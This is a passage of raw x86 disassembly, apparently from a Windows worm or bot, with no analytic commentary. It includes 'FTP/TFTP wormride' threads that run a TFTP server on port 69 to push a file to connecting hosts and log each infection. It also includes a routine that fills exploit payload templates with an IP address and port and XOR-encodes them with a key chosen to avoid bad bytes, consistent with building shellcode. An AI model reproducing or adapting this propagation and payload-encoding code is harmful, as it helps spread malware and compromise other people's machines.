jmp short loc_411C04
; ---------------------------------------------------------------------------
loc_411BFD: ; CODE XREF: sub_411BBC:loc_411CAB�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_411C04: ; CODE XREF: sub_411BBC+3F�j
cmp [ebp+var_8], 0FFFFh
jnb loc_411CB0
push 0Ah
lea eax, [ebp+var_18]
push eax
push [ebp+var_8]
call sub_416F7A ; _itoa
add esp, 0Ch
push 0FFFFFFFFh
push 0
lea eax, [ebp+var_18]
push eax
push offset a127_0_0_1 ; "127.0.0.1"
call sub_4050EA
add esp, 10h
mov [ebp+var_1C4], eax
cmp [ebp+var_1C4], 0
jz short loc_411CAB
push [ebp+var_1C4]
call sub_411A09
pop ecx
test eax, eax
jz short loc_411C9F
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
cmp [ebp+var_4], 0
jnz short loc_411C76
push 2
lea eax, [ebp+var_18]
push eax
push [ebp+var_10]
call sub_404871
add esp, 0Ch
jmp short loc_411C9F
; ---------------------------------------------------------------------------
loc_411C76: ; CODE XREF: sub_411BBC+A5�j
push 2
lea eax, [ebp+var_18]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_411C9F
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_411D55
; ---------------------------------------------------------------------------
loc_411C9F: ; CODE XREF: sub_411BBC+98�j
; sub_411BBC+B8�j ...
push [ebp+var_1C4]
call sub_4053B1
pop ecx
loc_411CAB: ; CODE XREF: sub_411BBC+88�j
jmp loc_411BFD
; ---------------------------------------------------------------------------
loc_411CB0: ; CODE XREF: sub_411BBC+4F�j
cmp [ebp+var_10], 0
jnz short loc_411CC9
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_411D55
; ---------------------------------------------------------------------------
loc_411CC9: ; CODE XREF: sub_411BBC+F8�j
mov eax, [ebp+var_1C0]
push dword ptr [eax]
push offset unk_41C6DC
lea eax, [ebp+var_1BC]
push eax
call sub_40D53F
add esp, 0Ch
loc_411CE5: ; CODE XREF: sub_411BBC:loc_411D3C�j
push 3E8h
push [ebp+var_10]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_1C8], eax
cmp [ebp+var_1C8], 0
jz short loc_411D2E
cmp [ebp+var_1C8], 0FFFFFFFFh
jz short loc_411D2E
push [ebp+var_1C8]
push offset sub_41113B
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_411D2E
push [ebp+var_1C8]
call sub_4053B1
pop ecx
loc_411D2E: ; CODE XREF: sub_411BBC+145�j
; sub_411BBC+14E�j ...
mov eax, [ebp+var_1C0]
cmp dword ptr [eax+4], 0
jz short loc_411D3C
jmp short loc_411D3E
; ---------------------------------------------------------------------------
loc_411D3C: ; CODE XREF: sub_411BBC+17C�j
jmp short loc_411CE5
; ---------------------------------------------------------------------------
loc_411D3E: ; CODE XREF: sub_411BBC+17E�j
push [ebp+var_10]
call sub_404CBB
pop ecx
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
locret_411D55: ; CODE XREF: sub_411BBC+DE�j
; sub_411BBC+108�j
leave
retn 4
sub_411BBC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411D59 proc near ; DATA XREF: sub_411D68+4E�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_411BBC
pop ebp
retn 4
sub_411D59 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411D68 proc near ; CODE XREF: sub_40A9CF+70F�p
; sub_40A9CF+735�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
call sub_4042FB
test eax, eax
jz short loc_411D77
jmp short locret_411DC3
; ---------------------------------------------------------------------------
loc_411D77: ; CODE XREF: sub_411D68+B�j
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_411D8D
jmp short locret_411DC3
; ---------------------------------------------------------------------------
loc_411D8D: ; CODE XREF: sub_411D68+21�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aFtpWormrideThr ; "FTP wormride thread"
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_4]
push offset sub_411D59
call sub_4095A4
add esp, 10h
locret_411DC3: ; CODE XREF: sub_411D68+D�j
; sub_411D68+23�j
leave
retn
sub_411D68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411DC5 proc near ; DATA XREF: sub_4123F6+43�o
var_DAC = dword ptr -0DACh
var_DA8 = dword ptr -0DA8h
var_DA4 = dword ptr -0DA4h
var_DA0 = byte ptr -0DA0h
var_D9C = dword ptr -0D9Ch
var_D98 = byte ptr -0D98h
var_D94 = dword ptr -0D94h
var_D90 = dword ptr -0D90h
var_D8C = dword ptr -0D8Ch
var_D88 = dword ptr -0D88h
var_D84 = dword ptr -0D84h
var_D80 = byte ptr -0D80h
var_D7C = dword ptr -0D7Ch
var_D70 = byte ptr -0D70h
var_D6F = byte ptr -0D6Fh
var_D6E = byte ptr -0D6Eh
var_D6D = byte ptr -0D6Dh
var_D6C = byte ptr -0D6Ch
var_B6C = dword ptr -0B6Ch
var_B68 = dword ptr -0B68h
var_B64 = dword ptr -0B64h
var_B60 = dword ptr -0B60h
var_B5C = dword ptr -0B5Ch
var_B58 = dword ptr -0B58h
var_358 = dword ptr -358h
var_354 = byte ptr -354h
var_1B0 = word ptr -1B0h
var_1AE = word ptr -1AEh
var_1AC = dword ptr -1ACh
var_1A0 = dword ptr -1A0h
var_19C = byte ptr -19Ch
var_19B = byte ptr -19Bh
var_19A = byte ptr -19Ah
var_199 = byte ptr -199h
var_11C = byte ptr -11Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0DACh
push edi
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_358]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 0
push 2
push 2
call dword_417218 ; socket
mov [ebp+var_108], eax
cmp [ebp+var_108], 0FFFFFFFFh
jnz short loc_411E1D
push [ebp+var_358]
call sub_409763
pop ecx
xor eax, eax
jmp loc_4123F1
; ---------------------------------------------------------------------------
loc_411E1D: ; CODE XREF: sub_411DC5+43�j
lea eax, [ebp+var_104]
push eax
call sub_40CF25
push eax
call sub_40449C
pop ecx
pop ecx
push 10h
push 0
lea eax, [ebp+var_1B0]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_1B0], 2
push 45h
call dword_417238 ; htons
mov [ebp+var_1AE], ax
lea eax, [ebp+var_104]
push eax
call dword_417244 ; inet_addr
mov [ebp+var_1AC], eax
mov [ebp+var_1A0], 1
push 4
lea eax, [ebp+var_1A0]
push eax
push 4
push 0FFFFh
push [ebp+var_108]
call dword_417204 ; setsockopt
push 10h
lea eax, [ebp+var_1B0]
push eax
push [ebp+var_108]
call dword_417208 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_411EC2
push [ebp+var_358]
call sub_409763
pop ecx
xor eax, eax
jmp loc_4123F1
; ---------------------------------------------------------------------------
loc_411EC2: ; CODE XREF: sub_411DC5+E8�j
push offset aRb ; "rb"
push offset dword_41EAFC
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_10C], eax
cmp [ebp+var_10C], 0
jnz short loc_411F01
push [ebp+var_108]
call dword_417230 ; closesocket
push [ebp+var_358]
call sub_409763
pop ecx
xor eax, eax
jmp loc_4123F1
; ---------------------------------------------------------------------------
loc_411F01: ; CODE XREF: sub_411DC5+11B�j
mov eax, [ebp+var_358]
push dword ptr [eax]
push offset unk_41C788
lea eax, [ebp+var_354]
push eax
call sub_40D53F
add esp, 0Ch
push 2
push 0
push [ebp+var_10C]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_10C]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_4], eax
push 0
push 0
push [ebp+var_10C]
call sub_416B96 ; fseek
add esp, 0Ch
push 80h
push 0
lea eax, [ebp+var_19C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
loc_411F66: ; CODE XREF: sub_411DC5:loc_412084�j
; sub_411DC5:loc_4123C6�j
mov [ebp+var_B64], 1
and [ebp+var_B60], 0
and [ebp+var_B5C], 0
loc_411F7E: ; CODE XREF: sub_411DC5+234�j
and [ebp+var_B68], 0
jmp short loc_411F94
; ---------------------------------------------------------------------------
loc_411F87: ; CODE XREF: sub_411DC5:loc_411FB9�j
mov eax, [ebp+var_B68]
inc eax
mov [ebp+var_B68], eax
loc_411F94: ; CODE XREF: sub_411DC5+1C0�j
mov eax, [ebp+var_B68]
cmp eax, [ebp+var_B5C]
jnb short loc_411FBB
mov eax, [ebp+var_B68]
mov eax, [ebp+eax*4+var_B58]
cmp eax, [ebp+var_108]
jnz short loc_411FB9
jmp short loc_411FBB
; ---------------------------------------------------------------------------
loc_411FB9: ; CODE XREF: sub_411DC5+1F0�j
jmp short loc_411F87
; ---------------------------------------------------------------------------
loc_411FBB: ; CODE XREF: sub_411DC5+1DB�j
; sub_411DC5+1F2�j
mov eax, [ebp+var_B68]
cmp eax, [ebp+var_B5C]
jnz short loc_411FF5
cmp [ebp+var_B5C], 200h
jnb short loc_411FF5
mov eax, [ebp+var_B68]
mov ecx, [ebp+var_108]
mov [ebp+eax*4+var_B58], ecx
mov eax, [ebp+var_B5C]
inc eax
mov [ebp+var_B5C], eax
loc_411FF5: ; CODE XREF: sub_411DC5+202�j
; sub_411DC5+20E�j
xor eax, eax
test eax, eax
jnz short loc_411F7E
lea eax, [ebp+var_B64]
push eax
push 0
push 0
lea eax, [ebp+var_B5C]
push eax
push 0
call dword_41722C ; select
test eax, eax
jle loc_4123B8
mov [ebp+var_D84], 10h
mov al, byte_41DE00
mov [ebp+var_D70], al
mov ecx, 80h
xor eax, eax
lea edi, [ebp+var_D6F]
rep stosd
stosw
stosb
lea eax, [ebp+var_D84]
push eax
lea eax, [ebp+var_D80]
push eax
push 0
push 80h
lea eax, [ebp+var_19C]
push eax
push [ebp+var_108]
call dword_417258 ; recvfrom
mov [ebp+var_B6C], eax
cmp [ebp+var_B6C], 0
jz short loc_412084
cmp [ebp+var_B6C], 0FFFFFFFFh
jnz short loc_412089
loc_412084: ; CODE XREF: sub_411DC5+2B4�j
jmp loc_411F66
; ---------------------------------------------------------------------------
loc_412089: ; CODE XREF: sub_411DC5+2BD�j
movsx eax, [ebp+var_19C]
test eax, eax
jnz loc_4121C0
movsx eax, [ebp+var_19B]
cmp eax, 1
jnz loc_4121C0
lea eax, [ebp+var_19C]
mov [ebp+var_D88], eax
lea eax, [ebp+var_19C]
mov [ebp+var_D8C], eax
mov eax, [ebp+var_D88]
inc eax
inc eax
mov [ebp+var_D88], eax
mov eax, [ebp+var_D8C]
inc eax
inc eax
mov [ebp+var_D8C], eax
push [ebp+var_D8C]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_D8C]
lea eax, [ecx+eax+1]
mov [ebp+var_D8C], eax
push offset aOctet ; "octet"
call sub_416B40 ; strlen
pop ecx
push eax
push [ebp+var_D8C]
push offset aOctet ; "octet"
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jz short loc_41213F
push [ebp+var_D84]
lea eax, [ebp+var_D80]
push eax
push 0
push 13h
push offset dword_41C76C
push [ebp+var_108]
call dword_417250 ; sendto
jmp short loc_4121BB
; ---------------------------------------------------------------------------
loc_41213F: ; CODE XREF: sub_411DC5+354�j
push 0
push 0
push [ebp+var_10C]
call sub_416B96 ; fseek
add esp, 0Ch
and [ebp+var_D70], 0
mov [ebp+var_D6F], 3
and [ebp+var_D6E], 0
mov [ebp+var_D6D], 1
push [ebp+var_10C]
push 200h
push 1
lea eax, [ebp+var_D6C]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_D90], eax
push [ebp+var_D84]
lea eax, [ebp+var_D80]
push eax
push 0
mov eax, [ebp+var_D90]
add eax, 4
push eax
lea eax, [ebp+var_D70]
push eax
push [ebp+var_108]
call dword_417250 ; sendto
loc_4121BB: ; CODE XREF: sub_411DC5+378�j
jmp loc_4123B8
; ---------------------------------------------------------------------------
loc_4121C0: ; CODE XREF: sub_411DC5+2CD�j
; sub_411DC5+2DD�j
movsx eax, [ebp+var_19C]
test eax, eax
jnz loc_412396
movsx eax, [ebp+var_19B]
cmp eax, 4
jnz loc_412396
mov al, [ebp+var_19A]
mov [ebp+var_DA0], al
mov al, [ebp+var_199]
mov [ebp+var_D98], al
and [ebp+var_D70], 0
mov [ebp+var_D6F], 3
movzx eax, [ebp+var_D98]
cmp eax, 0FFh
jnz short loc_412242
mov al, [ebp+var_DA0]
add al, 1
mov [ebp+var_DA0], al
mov al, [ebp+var_DA0]
mov [ebp+var_D6E], al
and [ebp+var_D98], 0
mov al, [ebp+var_D98]
mov [ebp+var_D6D], al
jmp short loc_412268
; ---------------------------------------------------------------------------
loc_412242: ; CODE XREF: sub_411DC5+44C�j
mov al, [ebp+var_DA0]
mov [ebp+var_D6E], al
mov al, [ebp+var_D98]
add al, 1
mov [ebp+var_D98], al
mov al, [ebp+var_D98]
mov [ebp+var_D6D], al
loc_412268: ; CODE XREF: sub_411DC5+47B�j
movzx eax, [ebp+var_DA0]
shl eax, 8
movzx ecx, [ebp+var_D98]
lea eax, [eax+ecx-1]
mov [ebp+var_D9C], eax
push 0
mov eax, [ebp+var_D9C]
shl eax, 9
push eax
push [ebp+var_10C]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_10C]
push 200h
push 1
lea eax, [ebp+var_D6C]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_D94], eax
push [ebp+var_D84]
lea eax, [ebp+var_D80]
push eax
push 0
mov eax, [ebp+var_D94]
add eax, 4
push eax
lea eax, [ebp+var_D70]
push eax
push [ebp+var_108]
call dword_417250 ; sendto
cmp [ebp+var_D94], 0
jnz loc_412394
mov eax, [ebp+var_D9C]
shl eax, 9
cmp eax, [ebp+var_4]
jb loc_412394
mov eax, [ebp+var_D7C]
mov [ebp+var_DA8], eax
push [ebp+var_DA8]
push offset dword_41EAE0
call sub_409C9D
pop ecx
pop ecx
mov [ebp+var_DA4], eax
mov eax, [ebp+var_DA4]
cmp eax, [ebp+var_DA8]
jz short loc_412394
push 1
push offset dword_41EAE4
call sub_409C88
pop ecx
pop ecx
mov [ebp+var_DAC], eax
push 10h
push [ebp+var_D7C]
call dword_41721C ; inet_ntoa
push eax
lea eax, [ebp+var_11C]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_11C]
push eax
mov eax, [ebp+var_DAC]
inc eax
push eax
push offset aWormride ; "wormride"
push offset unk_41C730
push offset dword_41DA80
call sub_40D4AB
add esp, 14h
loc_412394: ; CODE XREF: sub_411DC5+52D�j
; sub_411DC5+53F�j ...
jmp short loc_4123B8
; ---------------------------------------------------------------------------
loc_412396: ; CODE XREF: sub_411DC5+404�j
; sub_411DC5+414�j
push [ebp+var_D84]
lea eax, [ebp+var_D80]
push eax
push 0
push 9
push offset dword_41C724
push [ebp+var_108]
call dword_417250 ; sendto
loc_4123B8: ; CODE XREF: sub_411DC5+252�j
; sub_411DC5:loc_4121BB�j ...
mov eax, [ebp+var_358]
cmp dword ptr [eax+4], 0
jz short loc_4123C6
jmp short loc_4123CB
; ---------------------------------------------------------------------------
loc_4123C6: ; CODE XREF: sub_411DC5+5FD�j
jmp loc_411F66
; ---------------------------------------------------------------------------
loc_4123CB: ; CODE XREF: sub_411DC5+5FF�j
push [ebp+var_10C]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_108]
call dword_417230 ; closesocket
push [ebp+var_358]
call sub_409763
pop ecx
xor eax, eax
loc_4123F1: ; CODE XREF: sub_411DC5+53�j
; sub_411DC5+F8�j ...
pop edi
leave
retn 4
sub_411DC5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4123F6 proc near ; CODE XREF: sub_40A9CF+726�p
; sub_40A9CF+742�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412410
jmp short locret_412446
; ---------------------------------------------------------------------------
loc_412410: ; CODE XREF: sub_4123F6+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aTftpWormrideTh ; "TFTP wormride thread"
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_4]
push offset sub_411DC5
call sub_4095A4
add esp, 10h
locret_412446: ; CODE XREF: sub_4123F6+18�j
leave
retn
sub_4123F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412448 proc near ; CODE XREF: sub_4125DF+88�p
; sub_4125DF+AD�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_41245A
; ---------------------------------------------------------------------------
loc_412453: ; CODE XREF: sub_412448:loc_41249A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_41245A: ; CODE XREF: sub_412448+9�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jnb short loc_41249C
and [ebp+var_8], 0
jmp short loc_41246F
; ---------------------------------------------------------------------------
loc_412468: ; CODE XREF: sub_412448:loc_412498�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_41246F: ; CODE XREF: sub_412448+1E�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_C]
jnb short loc_41249A
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
movsx ecx, [ebp+arg_10]
xor eax, ecx
mov ecx, [ebp+arg_8]
add ecx, [ebp+var_8]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_412498
push 1
pop eax
jmp short locret_41249E
; ---------------------------------------------------------------------------
loc_412498: ; CODE XREF: sub_412448+49�j
jmp short loc_412468
; ---------------------------------------------------------------------------
loc_41249A: ; CODE XREF: sub_412448+2D�j
jmp short loc_412453
; ---------------------------------------------------------------------------
loc_41249C: ; CODE XREF: sub_412448+18�j
xor eax, eax
locret_41249E: ; CODE XREF: sub_412448+4E�j
leave
retn
sub_412448 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4124A0 proc near ; CODE XREF: sub_4125DF+36�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 10h
and [ebp+var_4], 0
and [ebp+var_10], 0
and [ebp+var_8], 0
and [ebp+var_C], 0
cmp [ebp+arg_8], 1
jnz short loc_41250C
cmp [ebp+arg_4], 0B2h
jnb short loc_4124CC
xor eax, eax
jmp locret_4125DD
; ---------------------------------------------------------------------------
loc_4124CC: ; CODE XREF: sub_4124A0+23�j
mov [ebp+var_C], 0B2h
push [ebp+var_C]
push offset dword_41C964
push [ebp+arg_0]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 8Fh
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, 88h
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
add eax, 0ACh
mov [ebp+var_8], eax
jmp loc_41259C
; ---------------------------------------------------------------------------
loc_41250C: ; CODE XREF: sub_4124A0+1A�j
cmp [ebp+arg_8], 2
jnz short loc_412554
cmp [ebp+arg_4], 0C6h
jnb short loc_412522
xor eax, eax
jmp locret_4125DD
; ---------------------------------------------------------------------------
loc_412522: ; CODE XREF: sub_4124A0+79�j
mov [ebp+var_C], 0C6h
push [ebp+var_C]
push offset dword_41C89C
push [ebp+arg_0]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 89h
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
add eax, 0C0h
mov [ebp+var_8], eax
jmp short loc_41259C
; ---------------------------------------------------------------------------
loc_412554: ; CODE XREF: sub_4124A0+70�j
cmp [ebp+arg_4], 0B2h
jnb short loc_412561
xor eax, eax
jmp short locret_4125DD
; ---------------------------------------------------------------------------
loc_412561: ; CODE XREF: sub_4124A0+BB�j
mov [ebp+var_C], 0B2h
push [ebp+var_C]
push offset dword_41C7E8
push [ebp+arg_0]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 86h
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, 8Dh
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
add eax, 0ACh
mov [ebp+var_8], eax
loc_41259C: ; CODE XREF: sub_4124A0+67�j
; sub_4124A0+B2�j
cmp [ebp+var_4], 0
jz short loc_4125B0
push [ebp+arg_C]
call dword_417244 ; inet_addr
mov ecx, [ebp+var_4]
mov [ecx], eax
loc_4125B0: ; CODE XREF: sub_4124A0+100�j
cmp [ebp+var_10], 0
jz short loc_4125CC
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
push eax
call dword_417238 ; htons
mov ecx, [ebp+var_10]
mov [ecx], ax
loc_4125CC: ; CODE XREF: sub_4124A0+114�j
cmp [ebp+var_8], 0
jz short loc_4125DA
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_14]
mov [eax], ecx
loc_4125DA: ; CODE XREF: sub_4124A0+130�j
mov eax, [ebp+var_C]
locret_4125DD: ; CODE XREF: sub_4124A0+27�j
; sub_4124A0+7D�j ...
leave
retn
sub_4124A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4125DF proc near ; CODE XREF: sub_410649+8B�p
; sub_410B52+41�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 1Ch
cmp [ebp+arg_4], 1Ch
jnb short loc_4125F2
xor eax, eax
jmp locret_41271E
; ---------------------------------------------------------------------------
loc_4125F2: ; CODE XREF: sub_4125DF+A�j
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
add eax, 1Ch
mov [ebp+var_4], eax
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push 1E4h
push [ebp+var_4]
call sub_4124A0
add esp, 18h
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_41262D
xor eax, eax
jmp locret_41271E
; ---------------------------------------------------------------------------
loc_41262D: ; CODE XREF: sub_4125DF+45�j
push 1Ch
push offset loc_41C7C8
push [ebp+var_10]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, dword_41CB98
mov [ebp+var_8], eax
jmp short loc_412659
; ---------------------------------------------------------------------------
loc_412649: ; CODE XREF: sub_4125DF+94�j
; sub_4125DF:loc_41269A�j
call sub_410422
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
mov dword_41CB98, eax
loc_412659: ; CODE XREF: sub_4125DF+68�j
push 0
push [ebp+arg_1C]
push [ebp+arg_18]
push 4
lea eax, [ebp+var_8]
push eax
call sub_412448
add esp, 14h
test eax, eax
jz short loc_412675
jmp short loc_412649
; ---------------------------------------------------------------------------
loc_412675: ; CODE XREF: sub_4125DF+92�j
mov eax, [ebp+var_14]
xor eax, [ebp+var_8]
mov [ebp+var_1C], eax
push 0
push [ebp+arg_1C]
push [ebp+arg_18]
push 4
lea eax, [ebp+var_1C]
push eax
call sub_412448
add esp, 14h
test eax, eax
jnz short loc_41269A
jmp short loc_41269C
; ---------------------------------------------------------------------------
loc_41269A: ; CODE XREF: sub_4125DF+B7�j
jmp short loc_412649
; ---------------------------------------------------------------------------
loc_41269C: ; CODE XREF: sub_4125DF+B9�j
mov eax, [ebp+var_10]
mov ecx, [ebp+var_8]
mov [eax+3], ecx
mov eax, [ebp+var_10]
mov ecx, [ebp+var_1C]
mov [eax+9], ecx
mov al, byte_41CB95
mov byte ptr [ebp+var_C], al
jmp short loc_4126C8
; ---------------------------------------------------------------------------
loc_4126B8: ; CODE XREF: sub_4125DF+104�j
call sub_410461
mov byte ptr [ebp+var_C], al
mov al, byte ptr [ebp+var_C]
mov byte_41CB95, al
loc_4126C8: ; CODE XREF: sub_4125DF+D7�j
push [ebp+var_C]
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_14]
push [ebp+var_4]
call sub_412448
add esp, 14h
test eax, eax
jz short loc_4126E5
jmp short loc_4126B8
; ---------------------------------------------------------------------------
loc_4126E5: ; CODE XREF: sub_4125DF+102�j
mov eax, [ebp+var_10]
mov cl, byte ptr [ebp+var_C]
mov [eax+12h], cl
and [ebp+var_18], 0
jmp short loc_4126FB
; ---------------------------------------------------------------------------
loc_4126F4: ; CODE XREF: sub_4125DF+137�j
mov eax, [ebp+var_18]
inc eax
mov [ebp+var_18], eax
loc_4126FB: ; CODE XREF: sub_4125DF+113�j
mov eax, [ebp+var_18]
cmp eax, [ebp+var_14]
jnb short loc_412718
mov eax, [ebp+var_4]
add eax, [ebp+var_18]
mov al, [eax]
xor al, byte ptr [ebp+var_C]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_18]
mov [ecx], al
jmp short loc_4126F4
; ---------------------------------------------------------------------------
loc_412718: ; CODE XREF: sub_4125DF+122�j
mov eax, [ebp+var_14]
add eax, 1Ch
locret_41271E: ; CODE XREF: sub_4125DF+E�j
; sub_4125DF+49�j
leave
retn
sub_4125DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412720 proc near ; CODE XREF: sub_412A3A+C�p
; sub_412BC9+DF�p ...
var_194 = dword ptr -194h
var_190 = dword ptr -190h
var_18C = byte ptr -18Ch
var_E4 = byte ptr -0E4h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 194h
push 8
push 4
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_194], eax
and [ebp+var_190], 0
loc_412741: ; CODE XREF: sub_412720:loc_41278A�j
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+var_190]
mov [ebp+ecx+var_10], al
mov eax, [ebp+var_190]
inc eax
mov [ebp+var_190], eax
mov eax, [ebp+var_190]
cmp eax, [ebp+var_194]
jnz short loc_41278A
push offset dword_418620
mov eax, [ebp+var_190]
lea eax, [ebp+eax+var_10]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_41278C
; ---------------------------------------------------------------------------
loc_41278A: ; CODE XREF: sub_412720+4F�j
jmp short loc_412741
; ---------------------------------------------------------------------------
loc_41278C: ; CODE XREF: sub_412720+68�j
push 17Ch
push offset dword_41CA18
lea eax, [ebp+var_18C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push 17Ch
lea eax, [ebp+var_18C]
push eax
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
leave
retn
sub_412720 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4127D0 proc near ; CODE XREF: sub_412A3A+14D�p
; sub_412BC9+133�p ...
var_24C = byte ptr -24Ch
var_22C = byte ptr -22Ch
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 24Ch
cmp dword_41EAEC, 0
jnz loc_4128A0
mov dword_41EAEC, 1
and [ebp+var_20C], 0
jmp short loc_412806
; ---------------------------------------------------------------------------
loc_4127F9: ; CODE XREF: sub_4127D0:loc_41289B�j
mov eax, [ebp+var_20C]
inc eax
mov [ebp+var_20C], eax
loc_412806: ; CODE XREF: sub_4127D0+27�j
mov eax, [ebp+var_20C]
imul eax, 0Ch
cmp off_41DA40[eax], 0
jz loc_4128A0
push 20h
mov eax, [ebp+var_20C]
imul eax, 0Ch
push off_41DA40[eax]
lea eax, [ebp+var_22C]
push eax
call sub_407A56
add esp, 0Ch
push 20h
mov eax, [ebp+var_20C]
imul eax, 0Ch
push off_41CBA0[eax]
lea eax, [ebp+var_24C]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_22C]
push eax
call sub_4105AD
pop ecx
lea eax, [ebp+var_24C]
push eax
call sub_4105AD
pop ecx
lea eax, [ebp+var_24C]
push eax
lea eax, [ebp+var_22C]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_41289B
mov dword_41EAF0, 1
